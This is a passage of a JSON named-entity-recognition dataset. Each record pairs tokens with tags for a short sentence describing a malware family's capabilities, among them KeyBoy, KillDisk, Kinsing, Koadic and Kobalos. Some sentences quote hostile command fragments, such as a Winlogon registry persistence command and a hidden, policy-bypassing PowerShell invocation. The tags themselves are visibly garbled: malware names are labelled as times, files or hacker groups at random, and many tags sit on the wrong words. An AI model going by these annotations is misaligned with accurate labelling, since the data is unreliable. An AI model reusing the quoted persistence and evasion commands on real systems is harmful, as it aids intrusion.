"ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "trojanized", "the", "<sode>ssh_login</code>", "and", "<code>user-auth_pubkey</code>", "functions", "to", "steal", "plaintext", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Kessel", "can", "use", "a", "proxy", "during", "exfiltration", "if", "set", "in", "the", "configuration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "exfiltrated", "data", "via", "hexadecimal-encoded", "subdomain", "fields", "of", "DNS", "queries." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "collected", "the", "system", "architecture,", "OS", "version,", "and", "MAC", "address", "information." ], "ner_tags": [ "B-Time", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kessel", "has", "collected", "the", "DNS", "address", "of", "the", "infected", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Variants", "of", "Kevin", "can", "communicate", "over", "DNS", "through", "queries", "to", "the", "server", "for", "constructed", "domain", "names", "with", "embedded", "information." ], "ner_tags": [ "O", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "create", "directories", "to", "store", "logs", "and", "other", "collected", "data." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "exfiltrate", "data", "to", "the", "C2", "server", "in", "27-character", "chunks." ], "ner_tags": [ "B-HackOrg", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "upload", "logs", "and", "other", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "has", "Base64-encoded", "its", "configuration", "file." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "send", "data", "from", "the", "victim", "host", "through", "a", "DNS", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "assign", "hard-coded", "fallback", "domains", "for", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "delete", "files", "created", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "hide", "the", "current", "window", "from", "the", "targeted", "user", "via", "the", "`ShowWindow`", "API", "function." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Kevin", "can", "download", "files", "to", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "generate", "a", "sequence", "of", "dummy", "HTTP", "C2", "requests", "to", "obscure", "traffic." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Kevin", "can", "use", "the", "`ShowWindow`", "API", "to", "avoid", "detection." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "use", "a", "custom", "protocol", "tunneled", "through", "DNS", "or", "HTTP." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Kevin", "has", "renamed", "an", "image", "of", "`cmd.exe`", "with", "a", "random", "name", "followed", "by", "a", "`.tmpl`", "extension." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Kevin", "can", "Base32", "encode", "chunks", "of", "output", "files", "during", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "enumerate", "the", "OS", "version", "and", "hostname", "of", "a", "targeted", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kevin", "can", "collect", "the", "MAC", "address", "and", "other", "information", "from", "a", "victim", "machine", "using", "`ipconfig/all`." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Kevin", "can", "sleep", "for", "a", "time", "interval", "between", "C2", "communication", "attempts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Variants", "of", "Kevin", "can", "communicate", "with", "C2", "over", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way" ] }, { "tokens": [ "Kevin", "can", "use", "a", "renamed", "image", "of", "`cmd.exe`", "for", "execution." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Kevin", "can", "compile", "randomly-generated", "MOF", "files", "into", "the", "WMI", "repository", "to", "persistently", "run", "malware." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "attempts", "to", "collect", "passwords", "from", "browsers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "uses", "the", "Dynamic", "Data", "Exchange", "(DDE)", "protocol", "to", "download", "remote", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "one", "version", "of", "KeyBoy,", "string", "obfuscation", "routines", "were", "used", "to", "hide", "many", "of", "the", "critical", "values", "referenced", "in", "the", "malware." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "has", "a", "command", "to", "launch", "a", "file", "browser", "or", "explorer", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "uses", "<code>-w", "Hidden</code>", "to", "conceal", "a", "PowerShell", "window", "that", "downloads", "a", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "has", "a", "download", "and", "upload", "functionality." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "KeyBoy", "installs", "a", "keylogger", "for", "intercepting", "credentials", "and", "keystrokes." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-SamFile", "B-Purp", "O", "O" ] }, { "tokens": [ "KeyBoy", "uses", "PowerShell", "commands", "to", "download", "and", "execute", "payloads." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "KeyBoy", "uses", "custom", "SSL", "libraries", "to", "impersonate", "SSL", "in", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "uses", "Python", "scripts", "for", "installing", "files", "and", "performing", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Features" ] }, { "tokens": [ "KeyBoy", "has", "a", "command", "to", "perform", "screen", "grabbing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "can", "gather", "extended", "system", "information,", "such", "as", "information", "about", "the", "operating", "system,", "disks,", "and", "memory." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "can", "determine", "the", "public", "or", "WAN", "IP", "address", "for", "the", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "time-stomped", "its", "DLL", "in", "order", "to", "evade", "detection." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "uses", "VBS", "scripts", "for", "installing", "files", "and", "performing", "execution." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O", "O", "B-Features" ] }, { "tokens": [ "KeyBoy", "can", "launch", "interactive", "shells", "for", "communicating", "with", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "installs", "a", "service", "pointing", "to", "a", "malicious", "DLL", "dropped", "to", "disk." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KeyBoy", "issues", "the", "command", "<code>reg", "add", "“HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon”</code>", "to", "achieve", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "prompts", "the", "users", "for", "credentials." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "uses", "a", "Launch", "Agent", "to", "persist." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Keydnap", "uses", "a", "copy", "of", "tor2web", "proxy", "for", "HTTPS", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "uses", "Python", "for", "scripting", "to", "execute", "additional", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Keydnap", "uses", "a", "resource", "fork", "to", "present", "a", "macOS", "JPEG", "or", "text", "file", "icon", "rather", "than", "the", "executable's", "icon", "assigned", "by", "the", "operating", "system." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "uses", "the", "keychaindump", "project", "to", "read", "securityd", "memory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "adds", "the", "setuid", "flag", "to", "a", "binary", "so", "it", "can", "easily", "elevate", "in", "the", "future." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "puts", "a", "space", "after", "a", "false", ".jpg", "extension", "so", "that", "execution", "actually", "goes", "through", "the", "Terminal.app", "program." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keydnap", "uses", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "has", "attempted", "to", "get", "the", "access", "token", "of", "a", "process", "by", "calling", "<code>OpenProcessToken</code>.", "If", "KillDisk", "gets", "the", "access", "token,", "then", "it", "attempt", "to", "modify", "the", "token", "privileges", "with", "<code>AdjustTokenPrivileges</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "deletes", "Application,", "Security,", "Setup,", "and", "System", "Windows", "Event", "Logs." ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "deletes", "system", "files", "to", "make", "the", "OS", "unbootable.", "KillDisk", "also", "targets", "and", "deletes", "files", "with", "35", "different", "file", "extensions." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Org", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "has", "a", "ransomware", "component", "that", "encrypts", "files", "with", "an", "AES", "key", "that", "is", "also", "RSA-1028", "encrypted." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "overwrites", "the", "first", "sector", "of", "the", "Master", "Boot", "Record", "with", "“0x00”." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "has", "the", "ability", "to", "quit", "and", "delete", "itself." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "has", "used", "the", "<code>FindNextFile</code>", "command", "as", "part", "of", "its", "file", "deletion", "process." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "registers", "as", "a", "service", "under", "the", "Plug-And-Play", "Support", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "KillDisk", "has", "called", "the", "Windows", "API", "to", "retrieve", "the", "hard", "disk", "handle", "and", "shut", "down", "the", "machine." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "uses", "VMProtect", "to", "make", "reverse", "engineering", "the", "malware", "more", "difficult." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "has", "called", "<code>GetCurrentProcess</code>." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "KillDisk", "terminates", "various", "processes", "to", "get", "the", "user", "to", "reboot", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "loads", "and", "executes", "functions", "from", "a", "DLL." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "retrieves", "the", "hard", "disk", "name", "by", "calling", "the", "<code>CreateFileA", "to", "\\\\.\\PHYSICALDRIVE0</code>", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "KillDisk", "attempts", "to", "reboot", "the", "machine", "by", "terminating", "specific", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "Kinsing", "has", "searched", "<code>bash_history</code>", "for", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "attempted", "to", "brute", "force", "hosts", "over", "SSH." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kinsing", "was", "executed", "with", "an", "Ubuntu", "container", "entry", "point", "that", "runs", "shell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "crontab", "to", "download", "and", "run", "shell", "scripts", "every", "minute", "to", "ensure", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "was", "run", "through", "a", "deployed", "Ubuntu", "container." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Kinsing", "was", "executed", "in", "an", "Ubuntu", "container", "deployed", "via", "an", "open", "Docker", "daemon", "API." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "the", "find", "command", "to", "search", "for", "specific", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "downloaded", "additional", "lateral", "movement", "scripts", "from", "C2." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "chmod", "to", "modify", "permissions", "on", "key", "files", "for", "use." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "searched", "for", "private", "keys." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "ps", "to", "list", "processes." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "a", "script", "to", "parse", "files", "like", "<code>/etc/hosts</code>", "and", "SSH", "<code>known_hosts</code>", "to", "discover", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "created", "and", "run", "a", "Bitcoin", "cryptocurrency", "miner." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "SSH", "for", "lateral", "movement." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "Unix", "shell", "scripts", "to", "execute", "commands", "in", "the", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "used", "valid", "SSH", "credentials", "to", "access", "remote", "hosts." ], "ner_tags": [ "B-Time", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kinsing", "has", "communicated", "with", "C2", "over", "HTTP." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "uninstall", "malware", "from", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "list", "drives", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "conceal", "its", "activity", "through", "hiding", "active", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "download", "and", "execute", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "initiate", "keylogging", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "remotely", "trigger", "keyboard", "input", "and", "mouse", "clicks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "Kivars", "has", "the", "ability", "to", "capture", "screenshots", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "use", "SSL", "and", "TLS", "for", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "B-Idus" ] }, { "tokens": [ "Koadic", "has", "2", "methods", "for", "elevating", "integrity.", "It", "can", "bypass", "UAC", "through", "`eventvwr.exe`", "and", "`sdclt.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Koadic", "can", "retrieve", "the", "current", "content", "of", "the", "user", "clipboard." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "download", "files", "off", "the", "target", "system", "to", "send", "back", "to", "the", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "perform", "process", "injection", "by", "using", "a", "reflective", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Koadic", "can", "obtain", "a", "list", "of", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "has", "used", "the", "command", "<code>Powershell.exe", "-ExecutionPolicy", "Bypass", "-WindowStyle", "Hidden</code>", "to", "hide", "its", "window." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "download", "additional", "files", "and", "tools." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Koadic", "can", "use", "mshta", "to", "serve", "additional", "payloads", "and", "to", "help", "schedule", "tasks", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "gather", "hashed", "passwords", "by", "gathering", "domain", "controller", "hashes", "from", "NTDS." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Koadic", "can", "scan", "for", "open", "TCP", "ports", "on", "the", "target", "network." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "scan", "local", "network", "for", "open", "SMB." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-Way" ] }, { "tokens": [ "Koadic", "has", "used", "PowerShell", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Koadic", "has", "added", "persistence", "to", "the", "`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", "Registry", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Koadic", "can", "use", "Regsvr32", "to", "execute", "additional", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "enable", "remote", "desktop", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "use", "Rundll32", "to", "execute", "additional", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Koadic", "has", "used", "scheduled", "tasks", "to", "add", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "gather", "hashed", "passwords", "by", "dumping", "SAM/SECURITY", "hive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Koadic", "can", "run", "a", "command", "on", "another", "machine", "using", "PsExec." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Koadic", "can", "obtain", "the", "OS", "version", "and", "build,", "computer", "name,", "and", "processor", "architecture", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "retrieve", "the", "contents", "of", "the", "IP", "routing", "table", "as", "well", "as", "information", "about", "the", "Windows", "domain." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "identify", "logged", "in", "users", "across", "the", "domain", "and", "views", "user", "sessions." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "performs", "most", "of", "its", "operations", "using", "Windows", "Script", "Host", "(VBScript)", "and", "runs", "arbitrary", "shellcode", "." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Koadic", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Koadic", "can", "open", "an", "interactive", "command-shell", "to", "perform", "command", "line", "functions", "on", "victim", "machines.", "Koadic", "performs", "most", "of", "its", "operations", "using", "Windows", "Script", "Host", "(Jscript)", "and", "to", "run", "arbitrary", "shellcode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Koadic", "can", "use", "WMI", "to", "execute", "commands." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Kobalos's", "authentication", "and", "key", "exchange", "is", "performed", "using", "RSA-512." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kobalos", "can", "remove", "all", "command", "history", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "replaced", "the", "SSH", "client", "with", "a", "trojanized", "SSH", "client", "to", "steal", "credentials", "on", "compromised", "systems." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "write", "captured", "SSH", "connection", "credentials", "to", "a", "file", "under", "the", "<code>/var/run</code>", "directory", "with", "a", "<code>.pid</code>", "extension", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "decrypts", "strings", "right", "after", "the", "initial", "communication,", "but", "before", "the", "authentication", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "exfiltrate", "credentials", "over", "the", "network", "via", "UDP." ], "ner_tags": [ "B-Tool", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kobalos", "has", "used", "a", "compromised", "SSH", "client", "to", "capture", "the", "hostname,", "port,", "username", "and", "password", "used", "to", "establish", "an", "SSH", "connection", "from", "the", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "can", "chain", "together", "multiple", "compromised", "machines", "as", "proxies", "to", "reach", "their", "final", "targets." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kobalos", "encrypts", "all", "strings", "using", "RC4", "and", "bundles", "all", "functionality", "into", "a", "single", "function", "call." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ 